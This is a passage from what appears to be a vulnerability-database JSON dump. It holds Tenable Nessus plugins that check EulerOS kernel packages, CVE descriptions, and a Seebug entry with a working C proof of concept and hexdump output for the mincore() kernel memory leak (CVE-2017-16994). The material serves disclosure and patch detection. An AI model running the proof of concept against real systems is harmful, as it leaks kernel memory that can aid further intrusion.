value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.49.1.155\",\n \"kernel-debug-3.10.0-229.49.1.155\",\n \"kernel-debuginfo-3.10.0-229.49.1.155\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.155\",\n \"kernel-devel-3.10.0-229.49.1.155\",\n \"kernel-headers-3.10.0-229.49.1.155\",\n \"kernel-tools-3.10.0-229.49.1.155\",\n \"kernel-tools-libs-3.10.0-229.49.1.155\",\n \"perf-3.10.0-229.49.1.155\",\n 
\"python-perf-3.10.0-229.49.1.155\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:56:36", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - The usbhid_parse function in\n drivers/hid/usbhid/hid-core.c in the Linux kernel,\n before 4.13.8, allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16533)\n\n - The cdc_parse_cdc_header() function in\n 'drivers/usb/core/message.c' in the Linux kernel,\n before 4.13.6, allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device. 
Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out, although we\n believe it is unlikely.(CVE-2017-16534)\n\n - The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel can allow\n local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16535)\n\n - The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (NULL pointer dereference and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16536)\n\n - The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel through 4.13.11 allows local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16537)\n\n - The drivers/media/usb/dvb-usb-v2/lmedm04.c in the Linux\n kernel, through 4.13.11, allows local users to cause a\n denial of service (general protection fault and system\n crash) or possibly have unspecified other impact via a\n crafted USB device, related to a missing warm-start\n check and incorrect attach timing\n (dm04_lme2510_frontend_attach versus\n dm04_lme2510_tuner).(CVE-2017-16538)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The 
ims_pcu_get_cdc_union_desc function in\n drivers/input/misc/ims-pcu.c in the Linux kernel,\n through 4.13.11, allows local users to cause a denial\n of service (ims_pcu_parse_cdc_data out-of-bounds read\n and system crash) or possibly have unspecified other\n impact via a crafted USB device.(CVE-2017-16645)\n\n - The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16649)\n\n - The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16650)\n\n - The Linux kernel is vulnerable to a use-after-free flaw\n when the Transformation User configuration\n interface (CONFIG_XFRM_USER) compile-time configuration\n is enabled. This vulnerability occurs while closing a\n xfrm netlink socket in xfrm_dump_policy_done. A\n user/process could abuse this flaw to potentially\n escalate their privileges on a system.(CVE-2017-16939)\n\n - The net/netfilter/nfnetlink_cthelper.c function in the\n Linux kernel through 4.14.4 does not require the\n CAP_NET_ADMIN capability for new, get, and del\n operations. This allows local users to bypass intended\n access restrictions because the nfnl_cthelper_list data\n structure is shared across all net\n namespaces.(CVE-2017-17448)\n\n - The __netlink_deliver_tap_skb function in\n net/netlink/af_netlink.c in the Linux kernel, through\n 4.14.4, does not restrict observations of Netlink\n messages to a single net namespace, when CONFIG_NLMON\n is enabled. 
This allows local users to obtain sensitive\n information by leveraging the CAP_NET_ADMIN capability\n to sniff an nlmon interface for all Netlink activity on\n the system.(CVE-2017-17449)\n\n - net/netfilter/xt_osf.c in the Linux kernel through\n 4.14.4 does not require the CAP_NET_ADMIN capability\n for add_callback and remove_callback operations. This\n allows local users to bypass intended access\n restrictions because the xt_osf_fingers data structure\n is shared across all network\n namespaces.(CVE-2017-17450)\n\n - The usb_destroy_configuration() function, in\n 'drivers/usb/core/config.c' in the USB core subsystem,\n in the Linux kernel through 4.14.5 does not consider\n the maximum number of configurations and interfaces\n before attempting to release resources. This allows\n local users to cause a denial of service, due to\n out-of-bounds write access, or possibly have\n unspecified other impact via a crafted USB device. Due\n to the nature of the flaw, privilege escalation cannot\n be fully ruled out, although we believe it is\n unlikely.(CVE-2017-17558)\n\n - The Salsa20 encryption algorithm in the Linux kernel,\n before 4.14.8, does not correctly handle zero-length\n inputs. This allows a local attacker the ability to use\n the AF_ALG-based skcipher interface to cause a denial\n of service (uninitialized-memory free and kernel crash)\n or have an unspecified other impact by executing a\n crafted sequence of system calls that use the\n blkcipher_walk API. 
Both the generic implementation\n (crypto/salsa20_generic.c) and x86 implementation\n (arch/x86/crypto/salsa20_glue.c) of Salsa20 are\n vulnerable.(CVE-2017-17805)\n\n - The HMAC implementation (crypto/hmac.c) in the Linux\n kernel, before 4.14.8, does not validate that the\n underlying cryptographic hash algorithm is unkeyed.\n This allows a local attacker, able to use the\n AF_ALG-based hash interface\n (CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash\n algorithm (CONFIG_CRYPTO_SHA3), to cause a kernel stack\n buffer overflow by executing a crafted sequence of\n system calls that encounter a missing SHA-3\n initialization.(CVE-2017-17806)\n\n - The KEYS subsystem in the Linux kernel omitted an\n access-control check when writing a key to the current\n task's default keyring, allowing a local user to bypass\n security checks to the keyring. This compromises the\n validity of the keyring for those who rely on\n it.(CVE-2017-17807)\n\n - A flaw was found in the Linux kernel's implementation\n of i8042 serial ports. An attacker could cause a kernel\n panic if they are able to add and remove devices as the\n module is loaded.(CVE-2017-18079)\n\n - The Linux kernel, before version 4.14.3, is vulnerable\n to a denial of service in\n drivers/md/dm.c:dm_get_from_kobject() which can be\n caused by local users leveraging a race condition with\n __dm_destroy() during creation and removal of DM\n devices. Only privileged local users (with\n CAP_SYS_ADMIN capability) can directly perform the\n ioctl operations for dm device creation and removal and\n this would typically be outside the direct control of\n the unprivileged attacker.(CVE-2017-18203)\n\n - The madvise_willneed function in the Linux kernel\n allows local users to cause a denial of service\n (infinite loop) by triggering use of MADVISE_WILLNEED\n for a DAX mapping.(CVE-2017-18208)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1501)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-18079", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-18203", "CVE-2017-17805", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-17448", "CVE-2017-16533", "CVE-2017-16536", "CVE-2017-18208", "CVE-2017-16939", "CVE-2017-17449", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16538", "CVE-2017-16534", "CVE-2017-17807", "CVE-2017-16644", "CVE-2017-16645", "CVE-2017-17806"], "modified": "2019-05-13T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1501.NASL", "href": "https://www.tenable.com/plugins/nessus/124824", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124824);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-16533\",\n \"CVE-2017-16534\",\n \"CVE-2017-16535\",\n \"CVE-2017-16536\",\n \"CVE-2017-16537\",\n \"CVE-2017-16538\",\n \"CVE-2017-16643\",\n \"CVE-2017-16644\",\n \"CVE-2017-16645\",\n \"CVE-2017-16649\",\n \"CVE-2017-16650\",\n \"CVE-2017-16939\",\n \"CVE-2017-17448\",\n \"CVE-2017-17449\",\n \"CVE-2017-17450\",\n \"CVE-2017-17558\",\n \"CVE-2017-17805\",\n \"CVE-2017-17806\",\n 
\"CVE-2017-17807\",\n \"CVE-2017-18079\",\n \"CVE-2017-18203\",\n \"CVE-2017-18208\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1501)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - The usbhid_parse function in\n drivers/hid/usbhid/hid-core.c in the Linux kernel,\n before 4.13.8, allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16533)\n\n - The cdc_parse_cdc_header() function in\n 'drivers/usb/core/message.c' in the Linux kernel,\n before 4.13.6, allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device. 
Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out, although we\n believe it is unlikely.(CVE-2017-16534)\n\n - The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel can allow\n a local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16535)\n\n - The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (NULL pointer dereference and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16536)\n\n - The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel through 4.13.11 allows local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16537)\n\n - The drivers/media/usb/dvb-usb-v2/lmedm04.c in the Linux\n kernel, through 4.13.11, allows local users to cause a\n denial of service (general protection fault and system\n crash) or possibly have unspecified other impact via a\n crafted USB device, related to a missing warm-start\n check and incorrect attach timing\n (dm04_lme2510_frontend_attach versus\n dm04_lme2510_tuner).(CVE-2017-16538)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The 
ims_pcu_get_cdc_union_desc function in\n drivers/input/misc/ims-pcu.c in the Linux kernel,\n through 4.13.11, allows local users to cause a denial\n of service (ims_pcu_parse_cdc_data out-of-bounds read\n and system crash) or possibly have unspecified other\n impact via a crafted USB device.(CVE-2017-16645)\n\n - The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16649)\n\n - The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16650)\n\n - The Linux kernel is vulerable to a use-after-free flaw\n when Transformation User configuration\n interface(CONFIG_XFRM_USER) compile-time configuration\n were enabled. This vulnerability occurs while closing a\n xfrm netlink socket in xfrm_dump_policy_done. A\n user/process could abuse this flaw to potentially\n escalate their privileges on a system.(CVE-2017-16939)\n\n - The net/netfilter/nfnetlink_cthelper.c function in the\n Linux kernel through 4.14.4 does not require the\n CAP_NET_ADMIN capability for new, get, and del\n operations. This allows local users to bypass intended\n access restrictions because the nfnl_cthelper_list data\n structure is shared across all net\n namespaces.(CVE-2017-17448)\n\n - The __netlink_deliver_tap_skb function in\n net/netlink/af_netlink.c in the Linux kernel, through\n 4.14.4, does not restrict observations of Netlink\n messages to a single net namespace, when CONFIG_NLMON\n is enabled. 
This allows local users to obtain sensitive\n information by leveraging the CAP_NET_ADMIN capability\n to sniff an nlmon interface for all Netlink activity on\n the system.(CVE-2017-17449)\n\n - net/netfilter/xt_osf.c in the Linux kernel through\n 4.14.4 does not require the CAP_NET_ADMIN capability\n for add_callback and remove_callback operations. This\n allows local users to bypass intended access\n restrictions because the xt_osf_fingers data structure\n is shared across all network\n namespaces.(CVE-2017-17450)\n\n - The usb_destroy_configuration() function, in\n 'drivers/usb/core/config.c' in the USB core subsystem,\n in the Linux kernel through 4.14.5 does not consider\n the maximum number of configurations and interfaces\n before attempting to release resources. This allows\n local users to cause a denial of service, due to\n out-of-bounds write access, or possibly have\n unspecified other impact via a crafted USB device. Due\n to the nature of the flaw, privilege escalation cannot\n be fully ruled out, although we believe it is\n unlikely.(CVE-2017-17558)\n\n - The Salsa20 encryption algorithm in the Linux kernel,\n before 4.14.8, does not correctly handle zero-length\n inputs. This allows a local attacker the ability to use\n the AF_ALG-based skcipher interface to cause a denial\n of service (uninitialized-memory free and kernel crash)\n or have an unspecified other impact by executing a\n crafted sequence of system calls that use the\n blkcipher_walk API. 
Both the generic implementation\n (crypto/salsa20_generic.c) and x86 implementation\n (arch/x86/crypto/salsa20_glue.c) of Salsa20 are\n vulnerable.(CVE-2017-17805)\n\n - The HMAC implementation (crypto/hmac.c) in the Linux\n kernel, before 4.14.8, does not validate that the\n underlying cryptographic hash algorithm is unkeyed.\n This allows a local attacker, able to use the\n AF_ALG-based hash interface\n (CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash\n algorithm (CONFIG_CRYPTO_SHA3), to cause a kernel stack\n buffer overflow by executing a crafted sequence of\n system calls that encounter a missing SHA-3\n initialization.(CVE-2017-17806)\n\n - The KEYS subsystem in the Linux kernel omitted an\n access-control check when writing a key to the current\n task's default keyring, allowing a local user to bypass\n security checks to the keyring. This compromises the\n validity of the keyring for those who rely on\n it.(CVE-2017-17807)\n\n - A flaw was found in the Linux kernel's implementation\n of i8042 serial ports. An attacker could cause a kernel\n panic if they are able to add and remove devices as the\n module is loaded.(CVE-2017-18079)\n\n - The Linux kernel, before version 4.14.3, is vulnerable\n to a denial of service in\n drivers/md/dm.c:dm_get_from_kobject() which can be\n caused by local users leveraging a race condition with\n __dm_destroy() during creation and removal of DM\n devices. Only privileged local users (with\n CAP_SYS_ADMIN capability) can directly perform the\n ioctl operations for dm device creation and removal and\n this would typically be outside the direct control of\n the unprivileged attacker.(CVE-2017-18203)\n\n - The madvise_willneed function in the Linux kernel\n allows local users to cause a denial of service\n (infinite loop) by triggering use of MADVISE_WILLNEED\n for a DAX mapping.(CVE-2017-18208)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1501\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4cf08299\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-18079\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-862.14.1.6_42\",\n \"kernel-devel-3.10.0-862.14.1.6_42\",\n \"kernel-headers-3.10.0-862.14.1.6_42\",\n \"kernel-tools-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-devel-3.10.0-862.14.1.6_42\",\n \"perf-3.10.0-862.14.1.6_42\",\n \"python-perf-3.10.0-862.14.1.6_42\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-12-25T18:28:21", "description": "I found the following bug with an AFL-based fuzzer:\r\n\r\nWhen `__walk_page_range()` is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace.\r\n\r\nThis bug can be reproduced with the following testcase:\r\n\r\n```\r\n$ cat mincore_test.c\r\n#define _GNU_SOURCE\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n\r\nunsigned char mcbuf[0x1000];\r\n\r\nint main(void) {\r\n if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)\r\n err(1, \"mmap\");\r\n\r\n for (int i=0; i<10000; i++) {\r\n if (mincore((void*)0x86000000, 0x1000000, mcbuf))\r\n perror(\"mincore\");\r\n write(1, mcbuf, 0x1000);\r\n }\r\n}\r\n$ gcc -o mincore_test mincore_test.c -Wall\r\n$ ./mincore_test | hexdump -C | head\r\n00000000 00 00 00 00 00 00 00 00 00 00 00 00 fe 01 00 00 |................|\r\n00000010 80 49 3d 20 c6 e9 ff ff c0 49 3d 20 c6 e9 ff ff |.I= .....I= ....|\r\n00000020 00 08 3c 20 c6 e9 ff ff 40 08 3c 20 c6 e9 ff ff |..< ....@.< ....|\r\n00000030 80 08 3c 20 c6 e9 ff ff c0 08 3c 20 c6 e9 ff ff |..< ......< ....|\r\n00000040 00 09 3c 20 c6 e9 ff ff 40 09 3c 20 c6 e9 ff ff |..< ....@.< ....|\r\n00000050 80 09 3c 20 c6 e9 ff ff c0 09 3c 20 c6 e9 ff ff |..< ......< ....|\r\n00000060 00 06 3c 20 c6 e9 ff ff 40 06 3c 20 c6 e9 ff ff |..< ....@.< ....|\r\n00000070 80 06 3c 20 c6 e9 ff ff c0 06 3c 20 
c6 e9 ff ff |..< ......< ....|\r\n00000080 00 07 3c 20 c6 e9 ff ff 40 07 3c 20 c6 e9 ff ff |..< ....@.< ....|\r\n00000090 80 07 3c 20 c6 e9 ff ff 80 78 84 0b c6 e9 ff ff |..< .....x......|\r\n```", "published": "2017-12-04T00:00:00", "type": "seebug", "title": "Linux: mincore() discloses uninitialized kernel heap pages(CVE-2017-16994)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16994"], "modified": "2017-12-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96915", "id": "SSV:96915", "sourceData": "", "sourceHref": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "amazon": [{"lastseen": "2020-11-10T12:36:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0861", "CVE-2017-16649", "CVE-2017-15115", "CVE-2017-16994", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2016-5195", "CVE-2017-1000405", "CVE-2017-16645"], "description": "**Issue Overview:**\n\nA flaw was found in the patches used to fix the 'dirtycow' vulnerability ([CVE-2016-5195 __](<https://access.redhat.com/security/cve/CVE-2016-5195>)). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages. ([CVE-2017-1000405 __](<https://access.redhat.com/security/cve/CVE-2017-1000405>))\n\nLinux kernel Virtualization Module (CONFIG_KVM) for the Intel processor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It could occur if a guest was to flood the I/O port 0x80 with write requests. A guest user could use this flaw to crash the host kernel resulting in DoS. ([CVE-2017-1000407 __](<https://access.redhat.com/security/cve/CVE-2017-1000407>))\n\nA BUG in drivers/net/usb/asix_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device. 
([CVE-2017-16647 __](<https://access.redhat.com/security/cve/CVE-2017-16647>))\n\nA BUG in drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (BUG and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16646 __](<https://access.redhat.com/security/cve/CVE-2017-16646>))\n\nThe ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16645 __](<https://access.redhat.com/security/cve/CVE-2017-16645>))\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16643 __](<https://access.redhat.com/security/cve/CVE-2017-16643>))\n\nThe walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call. ([CVE-2017-16994 __](<https://access.redhat.com/security/cve/CVE-2017-16994>))\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. 
